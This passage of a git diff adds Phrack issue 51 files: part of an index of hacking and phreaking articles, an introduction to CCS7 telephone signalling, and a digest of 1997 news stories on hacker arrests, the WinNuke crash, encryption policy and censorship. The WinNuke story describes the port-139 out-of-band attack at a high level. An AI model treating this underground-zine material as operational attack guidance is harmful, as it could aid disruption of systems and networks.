+        "Cyber Christ Meets Lady Luck Part II" 1994. I46 F20 42k        
+        "Cyber Christ Bites The Big Apple" 1994. I46 F23 60k        
+White Knight co-authored
+        "Exploring Information-America" 1992. I37 F4 51k
+"Wide Area Networks Part 1" by Jester Sluggo. 1986. I5 F7 10k
+"Wide Area Networks Part 2" by Jester Sluggo. 1986. I6 F8 10k
+"The Wonderful World of Pagers" by Erik Bloodaxe. 1994. I46 F8
+
+
+                                   ** X **
+
+
+X.25 PACKET SWITCHING NETWORKS (SprintNet, Telenet, Tymnet, X.121 etc.)
+   "A Few Things About Networks" by Prime Suspect. 1988. I18 F9 21k
+   "An Introduction to Packet Switched Networks" by Epsilon. 1988. I18 F3 12k
+   "BT Tymnet, Part 1/3" by Toucan Jones. 1992. I40 F8 57k
+   "BT Tymnet, Part 2/3" by Toucan Jones. 1992. I40 F9 55k
+   "BT Tymnet, Part 3/3" by Toucan Jones. 1992. I40 F10 91k
+   "Datapac" by Synapse. 1993. I44 F21 36k
+   "Exploring Information-America" by The Omega & White Knight. 1992. I37 F4 51k
+   "Hacking and Tymnet" by SynThecide. 1989. I30 F3 20k
+   "Network Miscellany" by Racketeer. 1992. I40 F4 32k
+   "Network Miscellany" by Racketeer. 1992. I41 F4 35k
+   "Network Miscellany" by Taran King.  1989. I28 F4 30k
+   "Network Miscellany II" by Taran King. 1989. I29 F4 35k
+   "Network Miscellany III" by Taran King. 1989. I30 F2 21k
+   "Network Miscellany IV" by Datastream Cowboy 1992. I38 F5 30k
+   "Network Miscellany V" by Datastream Cowboy. 1992. I39 F4 34k
+   "NUA List for Datex-P and X.25 Networks" by Oberdaemon. 1989. I27 F4 105k
+   "Sprintnet Directory Part 1/3" by Skylar. 1992. I42 F8 49k
+   "Sprintnet Directory Part 2/3" by Skylar. 1992. I42 F9 45k
+   "Sprintnet Directory Part 3/3" by Skylar. 1992. I42 F10 46k
+   "TAMS and Telenet Security" by Phreak_Accident. 1990. I31 F4 7k
+   "Tymnet Diagnostic Tools" by Professor Falken. 1992. I42 F5 35k
+   "Tymnet Security Memo" by Anonymous. 1990. I31 F7 9k
+   "Wide Area Information Services" by Mycroft 1992. I38 F8 11k
+   "Wide Area Networks Part 1" by Jester Sluggo. 1986. I5 F7 10k
+   "Wide Area Networks Part 2" by Jester Sluggo. 1986. I6 F8 10k
+Xxxx Xxxxxxxx authored
+        "A Day in The Life of a Warez Broker" 1995. I47 F20 13k
+
+
+                                   ** Y **
+
+
+"Yet AnoTher File on Hacking Unix" by >Unknown User<. 1988. I22 F6 19k
+"Your New Windows Background (Part 1)"<unencoded> by The Man. 1995. I47 F17 39k
+"Your New Windows Background (Part 2)"<unencoded> by The Man. 1995. I47 F18 46k
+
+ 
+----[  EOF
diff --git a/phrack51/15.txt b/phrack51/15.txt
new file mode 100644
index 0000000..5e29029
--- /dev/null
+++ b/phrack51/15.txt
@@ -0,0 +1,226 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 15 of 17
+
+
+-------------------------[  A Brief Introduction to CCS7
+
+
+--------[  Narbo[SLF] <narbo@xeo.net>
+  
+
+			0o0o0o0o0o0o0o0o0o0o0o0o0
+                        o     Introduction      o
+			0o0o0o0o0o0o0o0o0o0o0o0o0
+
+	Every day it seems that the telcos introduce some funky new calling 
+feature to make your life easier.  I'm sure at one point or another you've 
+probably wondered exactly how all of these calling features work.  The 
+answer?  Common Channel Interoffice Signaling or CCS7. 
+
+	CCS7 is somewhat analogous to TCP/IP in that it is a protocol that
+allows networked computers (in this case telephone switches) to talk to each 
+other.  It maps onto the OSI 7 Layer Reference Model model as such: 
+
+	---------------    ------------------------------
+         Application 7      OMAP | ASE |
+        ---------------    -------------
+        Presentation 6         TCAP    |
+        ---------------    -------------
+           Session   5                 |
+        ---------------                |     ISDN-UP
+         Transport   4                 |
+        ---------------    --------------
+                                SCCP     |
+           Network   3     ------------------------------
+                                    MTP Level 3
+        ---------------    ------------------------------
+          Data Link  2              MTP Level 2
+        ---------------    ------------------------------
+          Physical   1              MTP Level 1
+        ---------------    ------------------------------
+
+Legend:
+
+	OMAP: Operations, Maintenance and Administration Part
+	ASE : Application Service Layer
+	TCAP: Transaction Capabilities Application Part
+	SCCP: Signaling Connection Control Part
+     ISDN-UP: Integrated Systems Digital Network User Part
+	MTP : Message Transfer Part
+
+	This article will provide an introduction to how the network is
+set up, how messaging is done, and a brief example of a call setup/takedown. 
+
+			0o0o0o0o0o0o0o0o0o0o0o0o0
+			o	History		o
+			0o0o0o0o0o0o0o0o0o0o0o0o0
+
+	AT&Ts introduction of CCIS (Common Channel Interoffice Signaling)
+in 1976 brought a radical change to the way signaling was handled.  Before
+the advent of CCIS all signaling was done in band using the same trunks that
+would be used for customer conversations.  Instead of sending all information
+over the voice circuits (trunks) a new network was created specifically for
+signaling.
+
+	AT&T began immediate deployment of CCIS technology and the CCITT
+(Consultative Committee for International Telephone and Telegraph) adopted it 
+as an international standard called SS6 (Signaling System 6).  The current 
+version of the protocol is CCS7 (Common Channel Signaling System 7) and is 
+prevalent throughout North America.
+
+			0o0o0o0o0o0o0o0o0o0o0o0o0
+			o       Switches  	o
+			0o0o0o0o0o0o0o0o0o0o0o0o0
+
+CCS7 networks are based on a mesh of links connecting switches like the
+following:
+
+
+    ###(SP)       {SCP}---A---[STP] -B-- [STP]
+    #    |                   /  | \      / |  \ 
+    #    F                  /   |   \  /   |   \
+    #    |                 /    C    BB    C    \                   ###########
+    ###(SSP)              D     |  /    \  |     \                  #         #
+    #    |   \           /    [STP] -B-- [STP]    D               (SSP)---F   #
+    #    A     A        /    /           /    \    \               A      |   #
+    #    |       \     /    /           A      \    \              |      |   #
+    #  [STP] --B- [STP]    /           /        \    [STP] --B- [STP]-A-(SSP)##
+    #    | \      / |     D         {SCP}        D     | \      / |       |   #
+    #    |   \  /   |    /                        \    |   \  /   |       |   #
+    #    C    BB    C   /                          \   C    BB    C       |   #
+    #    |  /    \  |  /                            \  |  /    \  |       |   #
+    #  [STP] --B- [STP]                              [STP] --B- [STP]     |   #
+    #               |                                  |                  |   #
+    #               |--(SSP)                           |--------E---------|   #
+    #                    #                                                    #
+    ###########################################################################
+
+# = Trunks
+- = CCS7 links
+
+Explanation:
+
+STP (Signal Transfer Point):
+
+	STPs are tandem switches which act as the routers of the CCS7 network.
+They transfer messages between incoming and outgoing signaling links but do not
+originate messages other then those used for network management.  Since their
+sole function is to act as routers, STPs have NO trunks attached to them.  STPs
+are grouped into mated pairs.  These pairs are grouped into the quads you see
+in the above diagram.  This is all done for the sake of redundancy.
+
+SCP (Signal Control Point):
+
+	SCPs act as the application database servers for the CCS7 network.
+SSPs make database queries through the STPs to the SCPs for such things as
+800 number lookups.  As they are not used for direct line connections SCPs also
+do not have trunks attached to them.  SCPs are the least common type of switch;
+for instance, in Canada, there are only two SCPs, one of which is in Calgary, 
+the other in Toronto.
+
+SSP (Service Switching Point) and SP (Service Point):
+
+	SSPs and SPs are the most common switches (despite my diagram :)) and 
+are deployed as EO (End Office) switches and in PBXs (Private Branch Exchanges).
+On average each SSP can handle about 100,000 - 125,000 lines.  Of course the 
+amount of trunks actually available on the switch is considerably smaller then 
+the amount of incoming lines; the telcos have various modeling algorithms that 
+predict the maximum amount of trunks that will actually be used which is why 
+occasionally when, say, a U2 concert hits town a switch can run out of 
+available trunks as people rush the phones for tickets.  SSPs and SPs differ 
+only on that the former can enact SCP database queries while the latter cannot. 
+
+			0o0o0o0o0o0o0o0o0o0o0o0o0
+			o        Links   	o
+			0o0o0o0o0o0o0o0o0o0o0o0o0
+
+	A CCS7 link is nothing more then a dedicated 56/64K trunk.  There are 
+various classifications of link types: (Refer to the previous diagram for 
+examples)
+
+A Links:
+
+	Connect SSP/SPs and SCPs to STPs.
+
+B (Bridge) Links:
+
+	Connect two STP pairs together to form an STP quad.
+
+C (Cross) Links:
+
+	Connect mated STP pairs together.
+
+D Links:
+
+	Interconnect STP quads.
+
+E Links:
+
+	Connect SSP/SPs or SCPs to a STP pair other than their "home" pair.
+
+F Links:
+
+	Connect SSP/SPs and SCPs to each other.
+
+	Links are joined together to form linksets. A linkset is defined as all
+the links connecting one node in the network to another node.  Directly 
+analogous to linksets are routesets which map out the paths to all the other 
+nodes in the network by associating a cost with each possible linkset the 
+message could go out on. 
+
+	If that sounded confusing (and I know it did) here is a small example.
+Consider the following subsection from our bigger network:
+
+    ###(SP1) 
+    #    |   
+    #    |     
+    #    |     
+    ###(SSP1)   
+    #    |   \     
+    #    L1    L2    
+    #    |       \    
+    #  [STP1] ---- [STP2]--    
+    #    | \      /  |     |
+    #    |   \  /    | 	   |
+    #    |    \/     |     |
+    #    |  /    \   |     |
+    #  [STP3] ---- [STP4]  |
+    #                 \    /     
+    #                 (SSP2)                  
+    #                    #                                               
+    ######################
+
+
+	Say SSP1 wants to send a message to SSP2. The routeset to SSP2 on SSP1
+will be datafilled with two possible linksets that could be used; namely the
+ones going to STP1 and STP2.  However, it's obvious that using L2 would be more
+efficient, taking 2 hops instead of 3, via L1.  On the switch this would be 
+noted by L2 having a lower cost than L1.
+
+			0o0o0o0o0o0o0o0o0o0o0o0o0
+			o  Call Setup Example  	o
+			0o0o0o0o0o0o0o0o0o0o0o0o0
+
+	Call setup and takedown using CCS7 is handled by a subset of the 
+protocol called ISDN-UP (Integrated Services Digital Network User Part).  There
+are many messages belonging in this subset but only five are needed to make a 
+phone call.
+
+	Let's say I want to call Dr. Sardu using the network from the previous 
+example.  The good doctor's phone is serviced by SSP2 while mine is serviced 
+by SSP1.  When I pick up my phone the switch will detect that it is off the 
+hook and send a dial tone.  After dialing, an IAM (Initial Address Message) 
+will go out on the network from SSP1 to SSP2.  Assuming all goes well (the 
+phone is not busy, etc...) an ACM (Address Complete Message) will come back
+from SSP2 to SSP1. It is at this time that I hear the first ring tone in my
+receiver. The moment the other party picks up and all the trunks are seized
+an ANM (Answer Message) is sent from SSP2 to SSP1 and upon reception of this
+message billing starts (A few ms of free phone time. Woo woo!).  When the
+conversation is complete and one party hangs up, its switch will send an REL
+(Release Message) and upon reception the other party will hear the "click" of
+the phone being hung up.  When he then hangs up the final RCL (Release Complete)
+message will be sent and the seized trunks will return to idle.
+
+
+----[  EOF
+
+
diff --git a/phrack51/16.txt b/phrack51/16.txt
new file mode 100644
index 0000000..e4918b1
--- /dev/null
+++ b/phrack51/16.txt
@@ -0,0 +1,1830 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 16 of 17
+
+
+-------------------------[  P H R A C K     W O R L D     N E W S
+
+
+--------[  Issue 51
+
+
+ 0x1: Illinois man arrested after threatening Bill Gates
+ 0x2: Man Arrested In Tokyo On Hacker Charges
+ 0x3: FBI says hacker sold 100,000 credit card numbers
+ 0x4: MS Security Plugs Not Airtight
+ 0x5: BSA slams DTI's Encryption Plans
+ 0x6: Teen bypasses blocking software
+ 0x7: The Power to Moderate is the Power to Censor
+ 0x8: AOL Users in Britain Warned of Surveillance
+ 0x9: Georgia Expands the "Instruments of Crime"
+ 0xa: NASA Nabs Teen Computer Hacker
+ 0xb: Agriculture Dept. Web Site Closed after Security Breach
+ 0xc: Hackers Smash US Government Encryption Standard
+ 0xd: Hacker May Stolen JonBenet computer Documents
+ 0xe: Hacker Vows 'Terror' for Pornographers
+ 0xf: Mitnick Gets 22 Month Sentence
+0x10: New York Judge Prohibits State Regulation of Internet
+0x11: Breaking the Crypto Barrier
+0x12: Setback in Efforts to Secure Online Privacy
+0x13: Captain Crunch Web Site Now Moved
+0x14: US Justive Dept. Investigating Network Solutions
+0x15: Cyber Patrol Bans Crypt Newsletter
+0x16: Some humor on media hacks and hackers
+0x17: Court Mixes Internet Smut Provision
+
+ 0x1: Book Title: Underground
+ 0x2: Book Title: "Hackers"
+
+ 0x1: Convention: Cybercrime Conference Announcement
+ 0x2: Convention: Computers & The Law IV Symposium
+
+
+0x1>-------------------------------------------------------------------------
+ 
+
+Title: Illinois man arrested after threatening Bill Gates
+Source: Reuter
+Author: unknown
+
+SEATTLE (Reuter) - An Illinois man has been arrested and charged with
+threatening to kill Microsoft Corp. Chairman Bill Gates in a $5
+million extortion plot, authorities said on Friday.
+  
+Adam Pletcher was arrested on May 9 in the Chicago suburb of Long
+Grove, where he lives with his parents, and charged with extortion,
+federal prosecutors said. He was freed on $100,000 bond and is due to
+appear in U.S. District Court in Seattle on Thursday for arraignment.
+  
+According to court documents, Pletcher sent four letters to Gates,
+beginning in March, threatening to kill the software company founder
+and his wife, Melinda, unless payment of at least $5 million was made.
+  
+The first letter was intercepted at the company's headquarters in
+Redmond, Washington, by corporate security officers, who contacted the
+FBI.
+  
+Agents then used an America Online dating service specified by the
+author of the letters to track down Pletcher, described as a loner in
+his early 20s who spends much of his time in front of the computer.
+ 
+Authorities said they treated the threats seriously but did not
+believe Gates' life was ever in danger.
+ 
+"We generally think this was a kid with a rich fantasy life, just
+living that out," said Tom Ziemba, a spokesman for U.S. Attorney
+Katrina Pflaumer.
+ 
+"This was handled in a fairly routine fashion by Microsoft security
+and law enforcement agencies," Microsoft spokesman Mark Murray said.
+"At some point in the investigation Microsoft did make Bill aware of
+the situation."
+ 
+Pletcher's online activities have landed him in trouble before.
+ 
+In February the Illinois attorney general sued Pletcher, accusing him
+of defrauding consumers of thousands of dollars in an alleged Internet
+scam, according to a story in the Chicago Tribune. Several consumers
+complained they sent Pletcher up to $5,500 to find them a car deal and
+never got their money back.
+ 
+Despite his status as richest man in America, with a Microsoft stake
+valued at more than $30 billion, Gates is still known to travel alone
+on regularly scheduled flights. But Murray said the executive was
+well-protected.
+ 
+"We don't comment at all on Bill's security other than to say that
+there are extensive and appropriate security measures in place for
+Bill, for his family and for Microsoft facilities and personnel,"
+Murray said.
+ 
+0x2>-------------------------------------------------------------------------
+
+Title: Man Arrested In Tokyo On Hacker Charges
+Source: unknown
+Author: unknown
+
+TOKYO (May 23, 1997 10:31 a.m. EDT) - A 27-year-old Japanese man was
+arrested Friday on suspicion of breaking into an Internet home page of
+Asahi Broadcasting Corp. and replacing it with pornography, a police
+spokesman said.
+
+Koichi Kuboshima, a communications equipment firm employee from Saitama
+Prefecture, north of Tokyo, was arrested on charges of interrupting
+business by destroying a computer network.
+
+It was the first arrest related to illegal access to the information
+network, the police spokesman said, adding Kuboshima was also charged
+with displaying obscene pictures, the spokesman said.
+
+The suspect admitted to the crime, telling police he had done it for
+fun, police officials said.
+
+The Osaka-based broadcasting network blocked access to all of its home
+pages on Sunday immediately after it was notified of the offense by an
+Internet user.
+
+The Asahi home page is designed to allow users to download and upload
+information, which allowed Kuboshima to rewrite the contents, the
+spokesman said.
+
+0x3>-------------------------------------------------------------------------
+ 
+Title: FBI says hacker sold 100,000 credit card numbers
+Source: unknown
+Author: unknown
+
+SAN FRANCISCO (May 23, 1997 10:13 a.m. EDT) -- A clever hacker slipped
+into a major Internet provider and gathered 100,000 credit card
+numbers along with enough information to use them, the FBI said
+Thursday.
+
+Carlos Felipe Salgado, Jr., 36, who used the online name "Smak,"
+allegedly inserted a program that gathered the credit information from
+a dozen companies selling products over the Internet, said FBI
+spokesman George Grotz.
+
+[Secure electronic commerce is a novel idea.]
+  
+Salgado allegedly tried to sell the credit information to an
+undercover agent for $260,000. He was arrested Wednesday and faces a
+maximum 15 years in prison and $500,000 in fines if convicted on
+charges of unauthorized access of computers and trafficking in stolen
+credit card numbers.
+  
+"What is unique about this case is that this individual was able to
+hack into this third party, copy this information and encrypt it to be
+sold," Grotz said.
+
+[Since we know others have hacked in and stolen credit cards before,
+ the unique part is him trying to sell them. That isn't in keeping
+ with what federal agents love to say about hackers and credit card
+ incidents. Convenient how they change things like that.]
+  
+Had it succeeded, "at minimum we'd have 100,000 customers whose
+accounts could have been compromised and would not have known it until
+they got their bill at the end of the month," the FBI spokesman said.
+
+The scheme was discovered by the unidentified San Diego-based Internet
+provider during routine maintenance. Technicians found an intruder had
+placed a program in their server called a "packet sniffer," which
+locates specified blocks of information, such as credit card numbers.
+
+[Uh...more like they kept a nice ascii database full of the numbers
+ that was copied with expert technique like "cp ccdb"...]
+
+The FBI traced the intruder program to Salgado, who was using an
+account with the University of California-San Francisco.
+ 
+A school spokeswoman said officials have not yet determined whether
+Salgado attended or worked at the school, or how he got access to the
+account.
+  
+With the cooperation of a civilian computer user who was in
+communication with Salgado, the FBI arranged to have an undercover
+agent buy the stolen credit card information.
+ 
+After making two small buys, the FBI agents arranged to meet Salgado
+on Wednesday at San Francisco International Airport to pay $260,000
+for 100,000 credit card numbers with credit limits that ranged up to
+$25,000 each.
+  
+After decrypting and checking that the information was valid, Salgado
+was taken into custody at his parents' house in Daly City. Salgado
+waived his rights and acknowledged breaking into computers, including
+the San Diego company, according to the affidavit.
+ 
+The FBI has not found any evidence Salgado made any purchases with the
+numbers himself, the spokesman said, but the investigation is
+continuing.
+  
+Salgado appeared before a federal magistrate Thursday and was released
+on a $100,000 personal bond. Grotz said that as a condition of bail,
+"the judge forbids him to come anywhere near a computer."
+ 
+
+0x4>-------------------------------------------------------------------------
+ 
+Title: MS Security Plugs Not Airtight
+Source: unknown
+Author: Nick Wingfield
+
+(May 22, 1997, 12:45 p.m. PT) Microsoft (MSFT) is still struggling to
+completely patch Windows 95 and NT against Internet hacker attacks. 
+
+The company has posted a software patch that protects Windows 95 users
+from an attack that can crash their computers. The company issued a
+similar patch for Windows NT last week.
+
+But both the Windows NT and 95 patches aren't complete prophylactics for
+so-called out-of-band data attacks since both platforms can still be
+crashed by hackers with Macintosh and Linux computers. Microsoft said
+today that it hopes to post new patches by tonight that remedy the
+vulnerability to Mac- and Linux-based attacks.
+
+The current Windows 95 patch--without protection for Mac and Linux
+attacks--can be downloaded for free from Microsoft's Web site.
+
+This year, Microsoft programmers have been forced to create a medicine
+chest of software remedies to fix potential security risks in everything
+from the Internet Explorer browser to PowerPoint to Windows itself. Some
+security experts believe the company is struggling with deep-rooted
+vulnerabilities in its OS and Internet technologies.
+
+It's clear that the Internet has made it much easier for enterprising
+bug-finders to broadcast their discoveries to the press and public over
+email lists and Web pages. This has put intense pressure on
+Microsoft's engineering groups to quickly come up with patches. 
+
+Other companies, such as Sun Microsystems, have also had to release a
+number of patches for their technologies, but Microsoft has been
+especially hard-hit.
+
+A number of security experts believe that Microsoft would have had a
+hard time avoiding these security problems.
+
+"As a professional programmer, I have a real hard time saying that
+Microsoft should have seen this coming," said David LeBlanc, senior
+Windows NT security manager at Internet Security Systems, a developer of
+security software. "I get hit with this stuff too. With 20/20 hindsight,
+it's really obvious to see what we did wrong. Trying to take into
+account all the possibilities that can occur beforehand is not
+realistic."
+
+In order to exploit the latest vulnerability, Web sites must send a
+special TCP/IP command known as "out of band data" to port 139 of a
+computer running Windows 95 or NT. Hackers could also target users' PCs
+by using one of several programs for Windows, Unix, and Macintosh now
+circulating on the Net. With one program, called WinNuke, a hacker
+simply types a user's Internet protocol address and then clicks the
+program's "nuke" button in order to crash a PC over the Net. 
+
+The company's original patch for Windows NT prevents attacks from Unix
+and other Windows computers. But because of a difference in the way
+Mac and Linux computers handle the TCP protocol, Microsoft's patch
+didn't squelch attacks from those operating systems.
+
+[Bullshit meter: ****-   - In actuality, Microsoft just decided to
+ filter hits on that port looking for a keyword included in the
+ first 'winuke' script. By changing that word, 95 was once again
+ vulnerable to these attacks. Good work Microsoft.]
+
+A number of users have sent email to CNET's NEWS.COM complaining that
+their computers were repeatedly crashed as they chatted in Internet
+relay chat groups. When users are nuked by a hacker, their computer
+screens often display an error message loosely known as the "blue screen
+of death." 
+
+"The worst part about it is that the delinquents playing with this toy
+really like to play with it and keep on doing it," said Martin A.
+Childs, a law student at Louisiana State University in Baton Rouge. "The
+first time I got hit, I logged on six times before I managed to figure
+out what was going on."
+
+The original patches for Windows NT versions 4.0 and 3.51 are available
+on Microsoft's Web site. Last Thursday, the company also posted a
+collection of software patches, called service pack 3, that contains the
+NT out-of-band fix.
+
+The out-of-band data attacks also affect users of Windows 3.11, but a
+company spokeswoman said that Microsoft will not prepare a fix for that
+platform unless users request one.
+
+0x5>-------------------------------------------------------------------------
+ 
+Title: BSA slams DTI's Encryption Plans
+Source: The IT Newspaper
+Author: unknown
+Date: 26th June 1997
+
+ 
+ Government Proposals on encryption are 'unworkable, unfar, unweildy,
+ un-needed and frankly unacceptable', according to the British Software
+ Alliance (BSA) and the British Interactive Multimedia Association (Bima),
+ writes Tim Stammers.
+ 
+   In a joint statement, the organizations claimed that encryption
+ proposals from the DTI could 'cripple the growth of electronic comerce in
+ the UK'.
+ 
+   Tod Cohen, lawyer at Covington & Berling, council to the BSA, said:
+ 'These proposals could be a disaster for both users and vendors'.
+ 
+   The DTI's plan calls for UK organisations which want to encrypt email
+ and data to supply copies of their encryption keys to third parties.
+ 
+   Government agencies will then be able to demand access to copies of the
+ keys.  The DTI says the scheme aims to prevent criminal use of encryption
+ by drug dealers and terrorists.
+ 
+   But the BSA and BIMA claim that the proposed tystem will create a
+ massive bureaucratic structure will criminals will ignore.
+ 
+   'The sheer number of electronic communications could easily overwhelm
+ the system, without inreasing security or safety within the UK', their
+ statement said.
+ 
+   Sean Nye, executive member of Bima, said : 'In an age where personal
+ data and information is increasingly threatened with unwarranted
+ exposure, the DTI's proposals are a major step backwards'.
+ 
+   Opposition to the so-called key escrow system suggested by the DTI has
+ been widespread.  Public opponents include Brian Gladman, former deputy
+ director at Nato's labratories.
+ 
+   The proposals where formulated under the last government, and a
+ decision on their future is expected next month.
+ 
+   The US government is easing encryption export controls for software
+ companies which are prepared to back key escrow, but has met Senate
+ opposition to its plans.
+ 
+0x6>-------------------------------------------------------------------------
+ 
+Title: Teen bypasses blocking software
+Sounce: www.news.com
+Author: Courtney Macavinta
+Date: April 22, 1997, 5:30 p.m. PT
+
+A teenager is using his Web site to help others bypass one brand
+of filtering software intended to protect minors from illicit Net
+material.
+
+Using the "CYBERsitter codebreaker" from 18-year-old Bennett
+Haselton, surfers can now decode the list of all Net sites
+blocked by Solid Oak's Cybersitter software.
+
+Haselton--the founder of a teen organization called Peacefire
+that fights Net censorship--contends that the software violates
+free speech rights for adults and teen-agers. He claims the
+software is also falsely advertised because it promises parents
+the "ability to limit their children's access to objectionable
+material on the Internet," but also blocks other content on the
+Net.
+
+Haselton's campaign to get around Cybersitter has Solid Oak's
+president seeing red.
+
+Solid Oak denies Haselton's charges and is investigating the
+legality of the code-breaking program. "He doesn't know anything,
+and he's just a kid," Solid Oak President Brian Milburn said
+today. "We have never misrepresented our product--ever."
+
+Haselton's Cybersitter codebreaker can be used to crack a coded
+list of the sites that CYBERsitter blocks. The list is
+distributed to subscribers to notify users what sites are being
+blocked. Subscribers pay $39.95 for the software.
+
+The software blocks sites containing any words describing
+genitals, sex, nudity, porn, bombs, guns, suicide, racial slurs
+and other violent, sexual and derogatory terms.
+
+The list also blocks an array of sites about gay and lesbian
+issues, including PlanetOut and the International Gay and Lesbian
+Human Rights Commission . Cybersitter even blocks the National
+Organization for Women because it contains information about
+lesbianism, Solid Oak stated. "The NOW site has a bunch of
+lesbian stuff on it, and our users don't want it," said Milburn.
+
+The software also filters any site that contains the phrase
+"Don't buy CYBERsitter" as well as Haselton's own site and any
+reference to his name.
+
+Milburn says Haselton's campaign is hurting the product's
+marketability and hinted that the company will stop him, but
+wouldn't say exactly how.
+
+"We have users who think they purchased a secure product. This is
+costing us considerably," Milburn said. "But we're not going to
+let Bennett break the law."
+
+He did point out that Haselton's program to decode the software
+may violate its licensing agreement, which states: "Unauthorized
+reverse engineering of the Software, whether for educational,
+fair use, or other reason is expressly forbidden. Unauthorized
+disclosure of CYBERsitter operational details, hacks, work around
+methods, blocked sites, and blocked words or phrases are
+expressly prohibited."
+
+Haselton is undaunted by the suggestion of legal reprecussions.
+"I've talked to a lawyer who offered to represent me in the event
+that Cybersitter goes after me," he added.
+
+Haselton, a junior at Vanderbuilt University, argues that the
+software doesn't protect kids from smut, but just keeps them from
+learning new ideas.
+
+"Blocking software is not the solution to all of our problems.
+What's dangerous is not protecting [teenagers' free] speech on
+the Net as well," he said. "This is the age, when you form your
+opinions about social issues, human rights, and religion. We need
+to keep free ideas on the Net for people under 18."
+
+Haselton's organization is also a plaintiff in a lawsuit being
+argued today in New York, the American Library Association vs.
+Governor George Pataki. The case was filed to strike down a state
+law similar to the Communications Decency Act that prohibits
+making indecent material available to minors over the Net.
+
+0x7>-------------------------------------------------------------------------
+ 
+Title: The Power to Moderate is the Power to Censor
+Source: unknown
+Author: Paul Kneisel
+
+Some 200+ new news groups have just been created on the UseNet part of the
+Internet. They are grouped under a new <gov.*> hierarchy.
+
+<gov.*> promises to "take democracy into cyberspace," according to the
+press release from the National Science Foundation.[1] "The U.S.
+government," said U.S. Vice President Al Gore of the GovNews project, "is
+taking a leadership role in providing technology that could change the face
+of democracy around the world."[2]
+
+The GovNews project repeatedly stresses how it will support and promote
+feedback between governments and citizens. "Millions of people will now be
+able to follow and comment on government activity in selected areas of
+interest...," the release stated, promising "a wide, cost-effective
+electronic dissemination and discussion...."
+
+Preston Rich, the National Science Foundation's leader of the International
+GovNews Project, described GovNews as "newsgroups logically organized by
+topic from privatization, procurements and emergency alerts to toxic waste
+and marine resources and include[s] the capability to discuss such
+information."[1]
+
+The vast majority of the new <gov.*> groups are moderated.
+
+The idea of the moderated news
+group is increasingly accepted on UseNet. Off-topic posts, flames, and spam
+have made many non-moderated groups effectively unreadable by most users.
+Moderated groups are one effective way around these problems. New groups
+created in the non-<gov.*> "Big 8" UseNet hierarchy have formal charters
+defining the group. If the group is moderated then the powers, identity,
+and qualifications of the moderators are also listed. Unmoderated groups
+might be likened to informal free-for-all debates where there is no check
+on who can participate or on the form or content of what is said. Moderated
+groups are far closer to a specially-defined meeting of citizens with a
+formal Chair, empowered to declare certain topics off-limits for
+discussion, and to call unruly participants to order.
+
+An unmoderated UseNet group dedicated to baking cookies might be flooded
+with posts advertising bunion cures, reports of flying saucers sighted over
+Buckingham Palace, or articles denouncing Hillary Clinton as a Satanist. A
+moderator for the group has the power to block all of these posts, ensuring
+that they are not sent to the UseNet feed and do not appear among the
+on-topic discussion of cookies.
+
+Certainly some moderators on UseNet groups abuse their powers (as do some
+Chairs at non-Internet meetings.) But reports of such abuse are relatively
+rare given the number of moderated groups. And, of course, many complaints
+come from the proverbial "net.kooks" or those who oppose moderation in
+general.
+
+Moderators in the "Big 8" UseNet hierarchy are "civilians," not government
+employees moderating government-related groups while collecting government
+paychecks.
+
+The <gov.*> hierarchy inferentially changes this. I write "inferentially"
+because the charters, names and qualifications of the moderators in the
+200+ groups has not been formally announced. Nor do routine queries to
+members of the <gov.*> leading Hierarchial Coordinating Committee result in
+such detailed information.
+
+UseNet is not the entire Internet. Net-based technology like the World Wide
+Web and the "File Transfer Protocol" or FTP are designed for the one-way
+transmission of data. Few object to the _Congressional Record_ on-line or
+crop reports posted by the U.S. Department of Agriculture available on the
+Web or via FTP. But the news groups of UseNet are designed for two-way
+discussions, not spam-like one-way info-floods of data carefully selected
+by government bureaucrats.
+
+That creates an enormous problem when government employees moderate the
+discussion, regardless of how well, appropriately, or fairly the moderation
+is conducted.
+
+For government moderation of any discussion is censorship and it is wrong.
+
+Initial reports also indicate that most of the <gov.*> groups will be "robo
+[t]-moderated." In other words, specialized software programs will handle
+the bulk of the moderator's tasks. Robo-moderation, however, alters
+nothing. A good robo program may catch and eliminate 99% of the spam sent
+to the group or identify notorious flame-artists. But the power to
+robo-moderate remains the power to censor; the power to select one
+robo-moderator is the power to select another; the power to automatically
+remove bunion ads is simultaneously the power to eliminate all posts from
+Iraq in a political discussion or any message containing the string
+"Whitewater."
+
+In short, moderation on <gov.*> groups by government employees remains
+censorship whether conducted by software or humans, whether posts are
+approriately banned or the moderation places severe limits on free
+political speech. *Any* limitation of posts from any citizen by any
+government employee is censorship.
+
+It is also forbidden by law.
+
+FOOTNOTES
+[1] "GOVNEWS: N[ational] S[cience] F[oundation] Press Release for GovNews,"
+17 Mar 1997, <http://www.govnews.org/govnews/info/press.html>, accessed 21
+Mar 1997.
+
+[2] One wonders what technology Gore believes GovNews is providing.
+Certainly neither the Internet or UseNet is part of that technology for
+both existed long before GovNews.^Z
+
+0x8>-------------------------------------------------------------------------
+
+Title: AOL Users in Britain Warned of Surveillance
+Source: unknown
+Author: CHristopher Johnston
+
+LONDON - Subscribers logging onto AOL Ltd. in Britain this week
+were greeted with news that the Internet-service provider was
+imposing a tough new contract giving it wide latitude to disclose
+subscribers' private E-mail and on-line activities to law
+enforcement and security agencies.
+
+The new contract also requires users to comply with both British
+and U.S. export laws governing encryption. AOL Ltd. is a
+subsidiary of AOL Europe, which is a joint venture between
+America Online Inc. of the United States and Germany's
+Bertelsmann GmbH.
+
+The contract notes in part that AOL ''reserves the right to
+monitor or disclose the contents of private communication over
+AOL and your data to the extent permitted or required by law.''
+
+''It's bad news,'' said Marc Rotenberg, director of the
+Electronic Privacy Information Center, a Washington-based civil
+liberties organization. ''I think AOL is putting up a red flag
+that their commitment to privacy is on the decline.  It puts
+their users on notice that to the extent permitted by law, they
+can do anything they want.''
+
+The contract also prohibits subscribers from posting or
+transmitting any content that is ''unlawful, harmful,
+threatening, abusive, harassing, defamatory, vulgar, obscene,
+seditious, blasphemous, hateful, racially, ethnically or
+otherwise objectionable.''
+
+AOL and its competitors called the move part of a trend to
+protect on-line service providers from suits by users in case
+they are required to disclose subscribers' activities to law
+enforcement agencies.
+
+The contract also beefed up the legal wording relating to
+sensitive content such as pornography, and prohibiting the
+maintenance of links to obscene Web sites.
+
+The updated contract is also the first to inform subscribers that
+they are required to comply with both British and U.S. export
+laws governing encryption, or coding, a hot topic of debate
+recently between software publishers and security agencies.
+
+AOL Europe will provide similar contracts, which vary according
